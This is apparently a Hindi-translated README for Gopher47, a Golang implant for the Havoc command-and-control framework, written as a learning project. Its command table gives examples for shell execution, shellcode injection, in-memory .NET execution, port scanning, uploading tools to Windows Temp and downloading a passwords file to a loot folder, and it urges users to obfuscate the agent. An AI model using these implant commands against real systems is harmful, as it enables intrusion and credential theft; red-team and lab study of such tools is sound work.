
Havoc Framework के लिए एक तृतीय-पक्ष Gopher Assassin।
Havoc Framework के लिए एक तृतीय-पक्ष गोफर असैसिन
यह वीडियोगेम जैसा है :D
यह Golang में लिखा गया Havoc C2 के लिए एक तृतीय-पक्ष एजेंट है, जिसे मुख्य रूप से एक सीखने के प्रोजेक्ट के रूप में लिखा गया है, लेकिन मुझे यकीन है कि यह अभी भी उपयोगी है।
इसके रिलीज़ होने तक, आप मेरे ब्लॉग पर इसके क्या और क्यों के बारे में अधिक पढ़ सकते हैं: यहाँ
योगदान स्वागत योग्य हैं! मैं इसे बहुत नियमित रूप से अपडेट करने की योजना नहीं बनाता, लेकिन अगर मुझे इसे बनाने में मज़ा आता है तो समय के साथ कुछ और चीज़ें जोड़ सकता हूँ।
| Command | Description | Example |
|---|---|---|
checkin | बुनियादी सिस्टम जानकारी लौटाता है | checkin |
shell | एक कमांड चलाता है (Go के os/exec के माध्यम से निष्पादित) | shell netstat -ano |
kill | PID द्वारा एक प्रोसेस को समाप्त करता है | kill 31337 |
ls | किसी दिए गए निर्देशिका में फ़ाइलों की सूची दिखाता है | ls C:\Users\Administrator\Desktop |
ps | वर्तमान में चल रहे प्रोसेस की सूची दिखाता है | ps |
upload | किसी फ़ाइल को दूरस्थ पथ पर अपलोड करता है | upload /opt/chisel.exe C:\Windows\Temp\Bruh.exe |
download | किसी दूरस्थ फ़ाइल को लूट फ़ोल्डर में डाउनलोड करता है | download C:\passwords.txt pwd.txt |
portscan | एकल लक्ष्य पर TCP पोर्टस्कैन करता है। | portscan common 192.168.13.37 4 |
shellcode | CreateThread का उपयोग करके इम्प्लांट प्रोसेस में शेलकोड लोड करता है | shellcode 9090ccc3 |
execute-assembly | .NET असेंबली को मेमोरी में चलाता है | execute-assembly /opt/tools/Seatbelt.exe -group=user -q |
o7 | गोफर मर जाता है :( | o7 |
एक बार आपका टीमसर्वर तैयार हो जाए, तो यह उतना ही सरल है जितना निम्नलिखित चलाना:
python handler.py./gopher47आप इसे संकलित करने के लिए Havoc GUI का उपयोग कर सकते हैं, या आप स्रोत कोड को अपनी इच्छानुसार संपादित कर सकते हैं और Makefile के साथ खेल सकते हैं, इसमें ज़्यादा कुछ नहीं है।
मैं बस एक वास्तविक Golang प्रोजेक्ट एक साथ रखना चाहता था जिसे मैं इंगित कर सकूँ। लेकिन साथ ही, Golang क्रॉस-कंपाइलेशन के लिए बहुत अच्छा है, इसका विकास इकोसिस्टम अच्छा है, और यह C/C++ की तुलना में लिखना बहुत आसान है।
पता नहीं, लेकिन बड़े बनो। इसे खुद obfuscate करो और कस्टमाइज़ करो, बच्चे मत बनो।
Golang, Rust और अन्य भाषाओं के साथ, स्थिर रूप से (statically) संकलित करती हैं, जिसका अर्थ है कि एक्ज़ीक्यूटेबल को चलाने के लिए आवश्यक सभी लाइब्रेरीज़ बाइनरी में ही शामिल हो जाती हैं, जिससे आकार बढ़ जाता है। यदि आप आकार कम करना चाहते हैं, तो मैं डिफ़ॉल्ट रूप से नहीं करूँगा, लेकिन कुछ सुझावों के लिए इस लिंक को देखें। अपडेट: मैंने इसका कुछ हिस्सा करने के लिए एक विकल्प जोड़ा है, लेकिन मुझे यकीन है कि आप और अधिक कस्टमाइज़ेशन कर सकते हैं :/
खराब सवाल है, यदि आप कोड पढ़ते हैं तो आपको बहुत सी चीज़ें मिलेंगी जो आदर्श नहीं हैं। यदि आप वास्तव में OPSEC के बारे में चिंतित होते, तो आप अब तक कोड पढ़ना शुरू कर चुके होते और जहाँ आवश्यक हो वहाँ सुधार कर रहे होते।
अभी के लिए, वास्तव में नहीं। वर्तमान Havoc API केवल एक एजेंट द्वारा एक हैंडलर को संभालने की अनुमति देता है, और एक ही समय में कई को चालू रखने का कोई अच्छा, साफ तरीका नहीं है। पुनर्कार्य प्रगति पर है, लेकिन अभी के लिए, केवल एक Gopher47 हो सकता है।
नहीं। Havoc के संस्करण 0.4 तक, सीधे कुंजियों से समझौता किए बिना सुरक्षित कुंजी विनिमय करने का कोई तरीका नहीं है। एक बार जब सिस्टम को havoc-py इंटरफ़ेस में पुनर्कार्य किया जाता है, तो मैं उसे पूरा कर दूँगा। इसलिए यह OPSEC सुरक्षित नहीं है कृपया मूर्ख मत बनो और इसे वास्तविक अभियान में उपयोग मत करो, CTFs/लैब्स ठीक हैं
HTTPS एन्क्रिप्शन प्रदान करेगा, लेकिन अपने जोखिम पर उपयोग करें।
मैंने सुबह 1:00 बजे इसके लिए Golang गोफर के हाथ में एक बंदूक photoshop की।
किसी आक्रामक सुरक्षा से संबंधित शोध उपकरण को बनाना और उसे ओपन सोर्स के रूप में जारी करना, इस संभावना के बिना संभव नहीं है कि वह गलत हाथों में पड़ जाए। यह उपकरण केवल कानूनी, नैतिक उद्देश्यों के लिए उपयोग किया जाना है, जिसमें शोध, सुरक्षा मूल्यांकन, शिक्षा शामिल हैं, लेकिन इन्हीं तक सीमित नहीं हैं।
TL;DR: इसे कानूनी रखें।